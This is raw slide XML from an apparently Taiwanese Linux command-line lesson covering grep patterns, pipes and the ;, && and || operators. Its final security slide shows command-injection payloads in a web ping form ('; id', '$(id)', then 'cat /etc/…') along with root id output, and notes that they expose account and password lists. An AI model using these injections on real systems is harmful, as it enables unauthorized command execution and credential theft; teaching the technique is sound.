              <a:t>表達式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8845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尋找空白列的行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>數。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty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找出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>"so"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>結尾的資料。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty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找出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>"Server"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>開頭的資料。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty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找出含有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1"/>
              <a:t>ServerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1"/>
              <a:t>ServerRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1"/>
              <a:t>ServerAdmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>的那幾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="31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-406440" y="0"/>
              <a:ext cx="1683000" cy="18990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422280" y="-63360"/>
                <a:ext cx="1715040" cy="2025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7465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找出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>"Di******y"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>的字串，共</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>個字元的那幾行</a:t>
            </a:r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不要以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>"A"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
              <a:t>“K"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>字元開頭的那幾行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean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在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1"/>
              <a:t>ee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>的前面一個字元，只要不是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>都顯示出來</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean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搜尋有關</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>"Error"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>的字元資料。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33520" y="0"/>
              <a:ext cx="806760" cy="1194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7680" y="-63360"/>
                <a:ext cx="838440" cy="132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6098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顯示包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>"html"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>"Allow"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>字元的內容行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean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顯示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>結尾的行內容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1"/>
              <a:t>etc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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>檔案中，顯示非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>開頭的行內容。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36560" y="0"/>
              <a:ext cx="705240" cy="11498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0720" y="-63360"/>
                <a:ext cx="736920" cy="1276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942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9338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"|" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Pipline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>管道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>前一個指令的標準輸出作為下一個指令的標準輸入來處理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>語法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: A | B (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令的結果 導到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令中後，進行輸出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r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管線 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(pipe) | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的意義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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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3871566"/>
            <a:ext cx="5819775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76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9338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>從開機流程所產生的資訊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>dmesg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中撈出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>eth0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這張網路卡的相關資訊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en-US" altLang="zh-TW" kern="12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dmesg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 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="12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grep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 -n -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="12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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="1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kern="1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eth0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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管線 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(pipe) | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的範例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457280" y="2671560"/>
              <a:ext cx="4007880" cy="75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41440" y="2608200"/>
                <a:ext cx="40399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793480" y="1593000"/>
              <a:ext cx="86472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777640" y="1529640"/>
                <a:ext cx="8964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0" y="-85680"/>
              <a:ext cx="1057680" cy="12574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-15840" y="-149400"/>
                <a:ext cx="1089360" cy="138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7240" y="-228600"/>
              <a:ext cx="693360" cy="22575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1400" y="-292320"/>
                <a:ext cx="725040" cy="238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940680" y="1606680"/>
              <a:ext cx="44424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24840" y="1543320"/>
                <a:ext cx="4759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257800" y="1560960"/>
              <a:ext cx="2586960" cy="85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241960" y="1497600"/>
                <a:ext cx="261864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770760" y="2018160"/>
              <a:ext cx="5212440" cy="1116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54920" y="1954800"/>
                <a:ext cx="5244120" cy="238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6005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>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>“;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>用法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>連續下多個指令分號</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>root@linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> ~]# command1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>command2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>“&amp;&amp;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t> 用法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>第一個指令成功後，才可執行第二個指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>root@linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> ~]# command1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t>command2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>“||”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t> 用法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>第一個指令失敗後，仍可執行第二個指令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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" err="1"/>
              <a:t>root@linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0"/>
              <a:t> ~]# command1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" b="1" dirty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||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3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3000" dirty="0" smtClean="0"/>
              <a:t>command2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="26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指令介面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>下達進階用法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280160" y="2233800"/>
              <a:ext cx="2593440" cy="655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64320" y="2170080"/>
                <a:ext cx="262512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858640" y="2743200"/>
              <a:ext cx="300960" cy="33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42800" y="2679840"/>
                <a:ext cx="3326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423800" y="3944880"/>
              <a:ext cx="2345400" cy="72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07960" y="3881520"/>
                <a:ext cx="237708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767840" y="3938400"/>
              <a:ext cx="300960" cy="39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52000" y="3875040"/>
                <a:ext cx="332640" cy="16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695560" y="3990600"/>
              <a:ext cx="2991600" cy="72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679720" y="3927240"/>
                <a:ext cx="302328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080760" y="4474080"/>
              <a:ext cx="457560" cy="262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64920" y="4410360"/>
                <a:ext cx="48924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273680" y="5715000"/>
              <a:ext cx="2560680" cy="460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257840" y="5651640"/>
                <a:ext cx="259236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5225040" y="5662800"/>
              <a:ext cx="3142080" cy="198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209200" y="5599080"/>
                <a:ext cx="317376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852160" y="6270120"/>
              <a:ext cx="29448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836320" y="6206760"/>
                <a:ext cx="32616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95303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>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" b="1" dirty="0" smtClean="0"/>
              <a:t>資</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" b="1" dirty="0"/>
              <a:t>安</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" b="1" dirty="0" smtClean="0"/>
              <a:t>小天</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" b="1" dirty="0"/>
              <a:t>地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" b="1" dirty="0" smtClean="0"/>
              <a:t>惡意指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Command Injection(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>對網頁作注射攻擊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Ping for free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>ping: unknown host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>=0(root) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>=0(root) group=0(root)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>展開出執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>id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;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>打開系統帳號清單</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>打開密碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>清單</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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指令介面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令下達進階用法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09</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="圓角矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4568387" y="3037655"/>
            <a:ext cx="864096" cy="2358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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>submit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1547664" y="2924944"/>
            <a:ext cx="2899962" cy="37136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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ping –c [IP address] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id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1547664" y="3346656"/>
            <a:ext cx="2899962" cy="37136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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ping –c [IP address] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“$(id)”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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="圓角矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4568387" y="3441652"/>
            <a:ext cx="864096" cy="2358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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>submit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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="圓角矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547664" y="3812335"/>
            <a:ext cx="5904656" cy="37136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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ping –c [IP address] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“$(id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)”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;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="16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1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
